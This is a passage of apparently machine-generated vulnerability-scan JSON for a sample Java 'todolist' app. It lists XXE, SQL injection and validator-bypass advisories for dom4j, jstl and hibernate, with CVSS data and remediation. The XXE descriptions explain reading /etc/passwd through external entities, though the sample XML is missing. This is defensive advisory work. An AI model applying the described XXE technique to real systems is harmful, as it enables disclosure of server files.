"https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - 
], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - 
"cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } 
- ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - 
"[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. 
The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - 
], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - 
"url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. 
This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": 
"snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-30098", - "title": "JSM bypass via ReflectionHelper", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[4.1.0.Beta1, 4.3.2.Final)", - "[5.0.0.Final,5.1.2.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.2.Final", - "5.1.2.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", - "title": "GitHub Commit" - }, - { - "url": 